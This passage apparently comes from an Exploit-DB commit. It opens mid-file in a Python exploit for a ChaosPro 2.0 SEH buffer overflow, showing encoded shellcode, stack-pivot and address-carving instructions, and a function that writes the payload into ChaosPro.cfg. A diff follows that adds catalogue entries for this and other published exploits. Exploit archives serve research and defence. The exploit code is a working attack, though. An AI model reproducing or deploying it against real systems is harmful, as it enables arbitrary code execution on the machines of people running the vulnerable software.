 "\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47"
 "\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56"
 "\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58"
 "\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44"
 "\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42"
 "\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56"
 "\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69"
 "\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f"
 "\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a"
 "\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46"
 "\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31"
 "\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b"
 "\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69"
 "\x6f\x39\x45\x41\x41"
 ) # 710 bytes
 sploit += "A" * (2575 - 16 - 710)
 ################ First stage ####################
 # ESP: 0012E75C
 # ESP target: 0012FF98
 ## Need to align to four-byte and 16-byte boundaries:
 # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc
 # 282.0000
 # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc
 # 1551.0000
 # echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc
 # 183C
 # 0012FF32   54               PUSH ESP
 # 0012FF33   58               POP EAX
 # 0012FF34   66:05 3C18       ADD AX,183C
 # 0012FF38   50               PUSH EAX
 # 0012FF39   5C               POP ESP
 sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8
 # target instruction to push onto stack at new ESP:  FFE4 JMP ESP # 4141E4FF
 # ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803
 #    0:	25 28 28 28 28       	and    eax,0x28282828
 #    5:	25 47 47 47 47       	and    eax,0x47474747
 #    a:	2d 7f 01 7f 7f       	sub    eax,0x7f7f017f
 #    f:	2d 7f 01 01 01       	sub    eax,0x101017f
 #   14:	2d 03 18 3e 3e       	sub    eax,0x3e3e1803
 #   19:	50                   	push   eax
 sploit += (
 	"\x25\x28\x28\x28\x28"
 	"\x25\x47\x47\x47\x47"
 	"\x2d\x7f\x01\x7f\x7f"
 	"\x2d\x7f\x01\x01\x01"
 	"\x2d\x03\x18\x3e\x3e"
 	"\x50"
 ) # 26 bytes
 ## Realign new ESP with beginning of overflow buffer:
 ## New ESP should be four-byte and 16-byte aligned:
 # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc
 # 122.0000
 # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc
 # 671.0000
 # echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc
 # A7C
 ## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)
 # 0012FF54   44               INC ESP
 # 0012FF55   44               INC ESP
 # 0012FF56   44               INC ESP
 # 0012FF57   44               INC ESP
 # 0012FF58   44               INC ESP
 # 0012FF59   44               INC ESP
 # 0012FF5A   44               INC ESP
 # 0012FF5B   44               INC ESP
 sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8
 ## Going to have to carve out the address 0012F51C
 # ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864
 #   0:	25 02 02 02 02       	and    eax,0x2020202
 #   5:	25 51 51 51 51       	and    eax,0x51515151
 #   a:	2d 7f 01 7f 7f       	sub    eax,0x7f7f017f
 #   f:	2d 01 01 01 61       	sub    eax,0x61010101
 #  14:	2d 64 08 6d 1f       	sub    eax,0x1f6d0864
 #  19:	50                   	push   eax
 sploit +=(
 	"\x25\x02\x02\x02\x02"
 	"\x25\x51\x51\x51\x51"
 	"\x2d\x7f\x01\x7f\x7f"
 	"\x2d\x01\x01\x01\x61"
 	"\x2d\x64\x08\x6d\x1f"
 	"\x50"
 ) # 26 bytes
 ## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP
 # 5C   POP ESP
 sploit += "\x5c" # 1
 sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)
 ################ RET from SEH: JMP SHORT - 126 ####################
 sploit += "\xeb\x80" + "\x41\x41" # 4
 # 00401B44  |. 5F             POP EDI
 # 00401B45  |> 5E             POP ESI
 # 00401B46  \. C3             RETN
 sploit += "\x44\x1b\x40\x00"
 ################ build the config ####################
 ## Running from just outside base directory of ChaosPro:
 def ret_cfg(inp):
 	# do it live in PicturePath
 	cfg = """PicturePath %s""" % inp
 	with open("chaospro\\ChaosPro.cfg",'w') as F:
 		F.write(cfg)
 		F.close()
 ret_cfg(sploit)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6581,6 +6581,7 @@ id,file,description,date,author,type,platform,port
 47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows,
 47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows,
 47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows,
 47552,exploits/multiple/dos/47552.txt,"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed",2019-10-28,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10733,6 +10734,8 @@ id,file,description,date,author,type,platform,port
 47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris,
 47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows,
 47543,exploits/linux/local/47543.rb,"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)",2019-10-24,Metasploit,local,linux,
 47549,exploits/windows/local/47549.txt,"JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path",2019-10-28,"Roberto Escamilla",local,windows,
 47551,exploits/windows/local/47551.py,"ChaosPro 2.0 - Buffer Overflow (SEH)",2019-10-28,SYANiDE,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -41863,3 +41866,9 @@ id,file,description,date,author,type,platform,port
 47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware,
 47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware,
 47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,
 47545,exploits/hardware/webapps/47545.txt,"Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery",2019-10-28,"Prof. Joas Antonio",webapps,hardware,
 47546,exploits/php/webapps/47546.txt,"waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection",2019-10-28,cakes,webapps,php,
 47547,exploits/php/webapps/47547.txt,"Part-DB 0.4 - Authentication Bypass",2019-10-28,Marvoloo,webapps,php,
 47548,exploits/php/webapps/47548.txt,"waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting",2019-10-28,cakes,webapps,php,
 47550,exploits/php/webapps/47550.txt,"delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection",2019-10-28,cakes,webapps,php,
 47553,exploits/php/webapps/47553.md,"PHP-FPM + Nginx - Remote Code Execution",2019-10-28,"Emil Lerner",webapps,php,